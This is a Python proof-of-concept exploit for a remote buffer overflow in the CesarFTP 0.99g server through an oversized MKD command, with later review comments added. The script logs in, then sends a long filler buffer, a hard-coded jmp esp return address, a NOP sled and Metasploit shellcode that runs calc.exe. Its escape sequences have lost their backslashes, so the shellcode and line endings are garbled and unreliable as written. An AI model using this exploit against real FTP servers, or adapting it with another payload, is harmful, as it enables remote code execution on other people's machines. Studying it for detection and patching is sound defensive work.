
# Title : CesarFTP 0.99g (MKD) Remote Buffer Overflow Exploit
# Published : 2006-06-12
# Author : h07


#!/usr/bin/python
#CesarFtp 0.99g 0day Exploit
#Proof of Concept: execute calc.exe
#Tested on XP sp2 polish
#Bug found by h07 [h07@interia.pl]
#Date: 10.06.2006

from socket import *

# Payload appended to the end of the MKD argument built further down.
# NOTE(review): in this copy of the file the escape sequences have lost their
# backslashes, so this literal evaluates to the printable text shown rather
# than the raw bytes the header comment describes. Do not treat these
# characters as byte-accurate indicators when writing detections from this
# page; only the overall command structure is reliable here.
shellcode = ( #execute calc.exe <metasploit.com>
"x31xc9x83xe9xdbxd9xeexd9x74x24xf4x5bx81x73x13xd8"
"x22x72xe4x83xebxfcxe2xf4x24xcax34xe4xd8x22xf9xa1"
"xe4xa9x0exe1xa0x23x9dx6fx97x3axf9xbbxf8x23x99x07"
"xf6x6bxf9xd0x53x23x9cxd5x18xbbxdex60x18x56x75x25"
"x12x2fx73x26x33xd6x49xb0xfcx26x07x07x53x7dx56xe5"
"x33x44xf9xe8x93xa9x2dxf8xd9xc9xf9xf8x53x23x99x6d"
"x84x06x76x27xe9xe2x16x6fx98x12xf7x24xa0x2dxf9xa4"
"xd4xa9x02xf8x75xa9x1axecx31x29x72xe4xd8xa9x32xd0"
"xddx5ex72xe4xd8xa9x1axd8x87x13x84x84x8exc9x7fx8c"
"x28xa8x76xbbxb0xbax8cx6exd6x75x8dx03x30xccx8dx1b"
"x27x41x13x88xbbx0cx17x9cxbdx22x72xe4")

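def intel_order(i):
    """Return the low 32 bits of *i* as a 4-character little-endian string.

    The first character is the least-significant byte of *i*; bits above the
    32nd are discarded. Every character has a code point in 0..255, so the
    result corresponds one-to-one to the 4-byte little-endian encoding
    (``struct.pack("<I", ...)``) while staying a ``str`` in both Python 2
    and 3, which is what the caller concatenates into its text buffer.

    Args:
        i: integer to encode. Negative values wrap modulo 2**32 because
           Python's ``%``/``&`` on ints use floor semantics, exactly as the
           original shift-and-mod loop did.

    Returns:
        A 4-character string, least-significant byte first.
    """
    # ``& 0xFF`` is identical to ``% 256`` for Python ints and ``>>`` is an
    # arithmetic shift, so this reproduces the original byte for byte; the
    # rewrite only drops the local that shadowed the builtin ``str``.
    return "".join(chr((i >> (8 * k)) & 0xFF) for k in range(4))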

# --- Connection parameters --------------------------------------------------
# The target defaults to the loopback address: this proof of concept was
# written to be run against a local test install (header: "Tested on XP sp2").
host = "127.0.0.1"
port = 21
user = "h07"
password = "open"
# Hard-coded return address tied to one specific shell32.dll build (see the
# trailing comment). Fixed addresses like this are exactly what DEP/ASLR on
# later Windows releases are designed to defeat. The 4 bytes are written
# verbatim into the MKD argument via intel_order(EIP) below, so for this
# particular sample they are a usable detection artefact.
EIP = 0x7CA58265 #jmp esp <shell32.dll XP sp2 polish>

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)  # server banner; Python 2 print statement (file is Python 2)

# The script logs in before sending MKD. Whether the overflow is reachable
# without credentials is not established by this file, so do not assume that
# a restrictive login policy alone mitigates it.
# NOTE(review): the command terminators appear as "rn" in this copy because
# escape sequences lost their backslashes, as they did in the shellcode literal.
s.send("user %srn" % (user))
print s.recv(1024)

s.send("pass %srn" % (password))
print s.recv(1024)

# MKD argument layout: 671 repetitions of a filler token, 3 bytes of "A"
# padding, the 4-byte return address, a 40-repetition sled, then the payload.
# The argument therefore runs to well over 700 bytes, far beyond any realistic
# directory name. Server-side length validation of command arguments, or an
# IDS rule on oversized FTP command lines, would catch this class of input
# regardless of the exact bytes.
buffer = "MKD "
buffer += "n" * 671
buffer += "A" * 3 + intel_order(EIP)
buffer += "x90" * 40 + shellcode
buffer += "rn"

print "len: %d" % (len(buffer))

s.send(buffer)
print s.recv(1024)  # whatever the service still answers, if anything

s.close()

#EoF 
